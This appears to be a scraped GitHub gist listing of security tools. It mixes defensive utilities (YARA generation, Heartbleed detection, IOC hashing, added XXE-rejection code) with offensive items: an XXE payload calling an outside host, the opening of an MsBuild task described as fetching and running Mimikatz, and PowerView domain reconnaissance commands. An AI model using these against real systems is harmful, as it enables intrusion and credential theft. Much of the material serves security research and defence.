@schrodyn
schrodyn / gist:f027f973b71284322f9e870ffd8f1eb4
Created August 17, 2016 15:25 — forked from cdown/gist:1163649
Bash urlencode and urldecode
urlencode() {
    # urlencode <string>
    # Force the C collation so the bracket range below means ASCII only.
    old_lc_collate=$LC_COLLATE
    LC_COLLATE=C
    local length="${#1}"
    for (( i = 0; i < length; i++ )); do
        local c="${1:i:1}"
        case $c in
            # RFC 3986 unreserved characters pass through unchanged
            [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
            # everything else is emitted as %XX of its character value
            # (under a UTF-8 locale a multibyte character yields its code
            # point rather than its UTF-8 bytes; run under LC_ALL=C for
            # byte-wise encoding)
            *) printf '%%%02X' "'$c" ;;
        esac
    done
    LC_COLLATE=$old_lc_collate
}
@schrodyn
schrodyn / yara_fn.py
Created August 19, 2016 06:20 — forked from williballenthin/yara_fn.py
generate a yara rule that matches the basic blocks of the current function in IDA Pro
'''
IDAPython script that generates a YARA rule to match against the
basic blocks of the current function. It masks out relocation bytes
and ignores jump instructions (given that we're already trying to
match compiler-specific bytes, this is of arguable benefit).
If python-yara is installed, the IDAPython script also validates that
the generated rule matches at least one segment in the current file.
author: Willi Ballenthin
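The masking step described above, as an added example that is not williballenthin's yara_fn.py and does not need IDA: basic-block bytes are rendered as a YARA hex string with the bytes covered by caller-supplied (offset, length) ranges replaced by `??` (in IDA those ranges come from the fixup table; here the rel32 displacement of a call is used), blocks that keep too few literal bytes are dropped, and a small pure-Python matcher stands in for the yara-python validation. The sample block, the rule name and the `min_literal_bytes` threshold are constructed for the example.

```python
"""Added example (not williballenthin's yara_fn.py): build a YARA hex string from
basic-block bytes with relocation/displacement bytes wildcarded, and check the
pattern against a buffer without needing IDA or yara-python."""


def mask_block(code: bytes, wildcard_ranges) -> str:
    """Render `code` as a YARA hex string, replacing every byte covered by an
    (offset, length) entry of `wildcard_ranges` with '??'.  In the IDA script
    those ranges come from the relocation (fixup) table; here the caller
    supplies them, e.g. the rel32 displacement of a call/jmp."""
    masked = set()
    for offset, length in wildcard_ranges:
        masked.update(range(offset, offset + length))
    return " ".join("??" if i in masked else f"{b:02X}" for i, b in enumerate(code))


def build_rule(name: str, blocks, min_literal_bytes: int = 4) -> str:
    """Emit a rule with one $bbN string per basic block.  Blocks that keep
    fewer than `min_literal_bytes` literal bytes after masking are dropped
    (assumed threshold): a string that is mostly wildcards matches almost
    anything and makes scans slow."""
    strings = []
    for code, ranges in blocks:
        pattern = mask_block(code, ranges)
        if sum(1 for tok in pattern.split() if tok != "??") < min_literal_bytes:
            continue
        strings.append(pattern)
    if not strings:
        raise ValueError("no basic block kept enough literal bytes to be worth matching")
    lines = [f"rule {name}", "{", "    strings:"]
    for i, pattern in enumerate(strings):
        lines.append(f"        $bb{i} = {{ {pattern} }}")
    lines += ["    condition:", "        all of them", "}"]
    return "\n".join(lines)


def hex_pattern_matches(pattern: str, data: bytes) -> bool:
    """Naive matcher for a YARA hex string made of bytes and '??' only (no
    jumps or alternatives): the check yara_fn.py delegates to yara-python when
    it verifies the generated rule against the open file."""
    tokens = pattern.split()
    expected = [None if tok == "??" else int(tok, 16) for tok in tokens]
    for start in range(len(data) - len(tokens) + 1):
        if all(e is None or e == data[start + i] for i, e in enumerate(expected)):
            return True
    return False


# Constructed sample: push ebp; mov ebp,esp; call rel32; pop ebp; ret.  The four
# bytes of the call displacement (offsets 4..7) change whenever the function is
# relinked, so they are wildcarded.
SAMPLE_BLOCK = bytes.fromhex("558BECE8123456785DC3")
SAMPLE_RANGES = [(4, 4)]

if __name__ == "__main__":
    print(build_rule("func_sub_401000_hypothetical", [(SAMPLE_BLOCK, SAMPLE_RANGES)]))
```

`hex_pattern_matches` shows why the masking matters: the same block with a different call target still matches the masked pattern and no longer matches the unmasked one.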
@schrodyn
schrodyn / XXE_payloads
Created August 30, 2016 15:52 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound XXE or blind XXE
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
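The defensive counterpart to the payload above, as an added example that is not part of staaldraad's gist: the external entity (and external DTD) declarations these payloads depend on are reported by expat's DTD callbacks before any entity reference in the body is expanded, so an untrusted document can be rejected up front using only the standard library. The vanilla payload is taken verbatim from the gist; the parameter-entity variant and the `attacker.example` hostname are constructed for the example.

```python
"""Added example (not part of staaldraad's XXE_payloads gist): detect the external
entity / external DTD declarations these payloads rely on before the document is
parsed, using only the standard library."""
import xml.parsers.expat
import xml.etree.ElementTree as ET


class ExternalEntityError(ValueError):
    """Untrusted XML declared an external entity or external DTD."""


class _DtdScanned(Exception):
    """Internal signal: the DOCTYPE has been read, stop before the body."""


def find_external_references(xml_bytes: bytes):
    """Return [(name, uri), ...] for every external reference in the DOCTYPE:
    the external subset itself (name 'DOCTYPE'), general entities such as 'sp'
    in the vanilla payload, and parameter entities (reported with a leading
    '%') used by blind/out-of-band variants.  Parsing stops at the end of the
    DOCTYPE, so no entity reference in the body is ever expanded."""
    found = []

    def on_start_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            found.append(("DOCTYPE", system_id or public_id))

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            found.append(("%" + name if is_param else name, system_id or public_id))

    def on_end_doctype():
        raise _DtdScanned()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_start_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.EndDoctypeDeclHandler = on_end_doctype
    try:
        parser.Parse(xml_bytes, True)
    except _DtdScanned:
        pass
    except xml.parsers.expat.ExpatError:
        # A DTD that goes bad after declaring an external reference (for example
        # a parameter-entity reference expat refuses to follow) is still a
        # rejection; only a malformed document with nothing found is an error.
        if not found:
            raise
    return found


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Reject any document with external references, then parse the rest normally."""
    refs = find_external_references(xml_bytes)
    if refs:
        raise ExternalEntityError(f"external references in DOCTYPE: {refs}")
    return ET.fromstring(xml_bytes)


# The vanilla payload from the gist above, verbatim.
XXE_VANILLA = b"""<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>"""

# Constructed blind/out-of-band style variant: a parameter entity pointing at an
# attacker-hosted DTD (hostname is a placeholder).
XXE_PARAM = b"""<!DOCTYPE r [
<!ENTITY % x SYSTEM "http://attacker.example/evil.dtd">
%x;
]>
<r/>"""

if __name__ == "__main__":
    print(find_external_references(XXE_VANILLA))
    print(find_external_references(XXE_PARAM))
```

Internal entities are left alone, so ordinary documents with a DTD still parse; entity-expansion bombs (billion laughs) are a separate problem that this check does not address, which is one reason to use defusedxml for untrusted input in production rather than hand-rolled checks.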
@schrodyn
schrodyn / scrdec18-VC8.exe
Created September 13, 2016 17:19 — forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
@schrodyn
schrodyn / katz.xml
Created October 9, 2016 23:12
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@schrodyn
schrodyn / PowerView-2.0-tricks.ps1
Created October 9, 2016 23:35 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.
@schrodyn
schrodyn / gist:3aec990f926082614a4b51d7d39e5085
Created November 9, 2016 13:27 — forked from crisroura/gist:10473454
Live detection of client heartbleed attack with tcpdump
Slight modification of the tcpdump filter expression included in the heartbleed.py script by Riverbed [1][2] to detect live client-side heartbleed attacks.
Modified the original filter to detect traffic to a specific client host from any port. Also modified the length check to 68. For more information about this tcpdump filter take a look at the Riverbed blog post [2].
Detection tested with https://reverseheartbleed.com
tcpdump -i <INTERFACE> "((not ether proto 0x8100) and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68)))) or (vlan and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68))))"
Example to detect client heartbleed att
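The byte tests in the filter above, as an added example that is neither the gist's nor Riverbed's code: the same record-header checks (content type 0x18, version 3.x with minor < 4, TCP payload longer than 68 bytes) applied to a TCP payload in Python, alongside the length-consistency check that actually identifies a Heartbleed probe. The heartbeat records are constructed inline for the example.

```python
"""Added example (not from the gist or from Riverbed's heartbleed.py): the
record-header test the tcpdump expression performs, applied to a TCP payload in
Python, plus the length-consistency check that identifies a Heartbleed probe."""
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
HEARTBEAT_REQUEST = 0x01
MIN_PADDING = 16              # RFC 6520: at least 16 bytes of random padding


def heartbeat_record_length(tcp_payload: bytes):
    """The three byte tests from the filter: content type 0x18, version major
    3, minor < 4.  Returns the record length field, or None if the segment does
    not start with a heartbeat record."""
    if len(tcp_payload) < 5:
        return None
    ctype, major, minor, length = struct.unpack("!BBBH", tcp_payload[:5])
    if ctype != TLS_HEARTBEAT or major != 0x03 or minor >= 0x04:
        return None
    return length


def matches_tcpdump_filter(tcp_payload: bytes, min_len: int = 68) -> bool:
    """Mirror of the gist's expression: heartbeat record header plus a TCP
    payload longer than 68 bytes (the filter derives that length from the IP
    total length minus the IP and TCP header lengths)."""
    return heartbeat_record_length(tcp_payload) is not None and len(tcp_payload) > min_len


def is_heartbleed_probe(tcp_payload: bytes) -> bool:
    """A heartbeat_request whose claimed payload_length cannot fit in the
    record.  This is the bound the OpenSSL fix enforces
    (1 + 2 + payload + 16 > record length); a vulnerable peer answers such a
    request with payload_length bytes copied from its memory."""
    rec_len = heartbeat_record_length(tcp_payload)
    if rec_len is None or len(tcp_payload) < 8:
        return False
    hb_type, payload_len = struct.unpack("!BH", tcp_payload[5:8])
    if hb_type != HEARTBEAT_REQUEST:
        return False
    return 1 + 2 + payload_len + MIN_PADDING > rec_len


def build_heartbeat(payload: bytes, claimed_len=None, version=(3, 1)) -> bytes:
    """Constructed test data: one heartbeat_request record.  `claimed_len` lets
    the payload_length field lie, which is the whole Heartbleed trick."""
    length_field = len(payload) if claimed_len is None else claimed_len
    body = struct.pack("!BH", HEARTBEAT_REQUEST, length_field) + payload + b"\x00" * MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body)) + body


if __name__ == "__main__":
    benign = build_heartbeat(b"ping")
    probe = build_heartbeat(b"", claimed_len=0x4000)
    print("benign:", is_heartbleed_probe(benign), matches_tcpdump_filter(benign))
    print("probe: ", is_heartbleed_probe(probe), matches_tcpdump_filter(probe))
```

The 68-byte test is a heuristic: the minimal probe above is 24 bytes on the wire and would not pass it, so once the segment is in hand it is the length-consistency check, not the size, that separates a probe from a normal heartbeat. Both functions look only at the first record in a segment, exactly as the tcpdump expression does.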
@schrodyn
schrodyn / EquationDrug-IOC-list.txt
Created January 14, 2017 15:45 — forked from msuiche/EquationDrug-IOC-list.txt
List of EquationDrug IOCs #ShadowBrokers
PS E:\ioc> dir . | Foreach-Object{
>> $file = $_
>> $hash = Get-FileHash $file -Algorithm MD5
>> $fileinfo = Get-Item $file
>>
>> New-Object -TypeName PSObject -Property @{
>> LastWriteTime = $fileinfo.LastWriteTime
>> Length = $fileinfo.Length
>> Algorithm = $hash.Algorithm
>> MD5 = $hash.Hash
@schrodyn
schrodyn / ioc-generator.ps1
Created January 14, 2017 15:45 — forked from msuiche/ioc-generator.ps1
PowerShell IOCs generator
# One record per file in the current directory: version info, mtime, size and MD5.
dir . | Foreach-Object{
    $file = $_
    $hash = Get-FileHash $file -Algorithm MD5
    $fileinfo = Get-Item $file
    New-Object -TypeName PSObject -Property @{
        VersionInfo = $fileinfo.VersionInfo
        LastWriteTime = $fileinfo.LastWriteTime
        Length = $fileinfo.Length
        Algorithm = $hash.Algorithm
        MD5 = $hash.Hash
    }
}